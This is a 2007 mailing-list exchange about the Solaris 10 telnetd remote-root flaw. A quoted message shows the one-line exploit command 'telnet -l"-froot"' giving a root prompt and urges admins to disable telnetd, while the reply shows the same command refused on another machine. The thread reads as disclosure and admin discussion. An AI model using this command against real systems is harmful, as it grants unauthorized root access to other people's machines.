[geeks] Solaris 10 Remote-Root Exploit
Dr. Robert Pasken
rpasken at eas.slu.edu
Mon Feb 12 14:33:51 CST 2007
On Mon, 2007-02-12 at 07:45 -0600, Jonathan C. Patschke wrote:
> Just saw this on Slashdot:
>
> http://riosec.com/solaris-telnet-0-day
>
> And verified that it works:
>
> [jp at cobra:~]$ telnet -l"-froot" lic4
> Trying 10.10.100.120...
> Connected to lic4.centtech.com.
> Escape character is '^]'.
> Last login: Wed Jan 17 16:53:28 from hal10.centtech.
> Sun Microsystems Inc. SunOS 5.10 Generic January 2005
> You have mail.
> # Connection closed by foreign host.
> [jp at cobra:~]$ exit
> Connection to cobra.centtech.com closed.
>
> If you have any public-facing systems running Solaris's telnetd, you
> should disable it now. Even turning off remote root logins is
> insufficient, since this seems to bypass PAM.
>
Didn't work for me and I have telenetd turned on via svcadm
rpasken at thunder> telnet -l"-froot" thunder
Trying 165.134.144.220...
Connected to thunder.
Escape character is '^]'.
Not on system console
Connection to thunder closed by foreign host.
rpasken at thunder>
--
Dr. Robert Pasken <rpasken at eas.slu.edu>
Earth and Atmospheric Sciences Saint Louis University
More information about the geeks
mailing list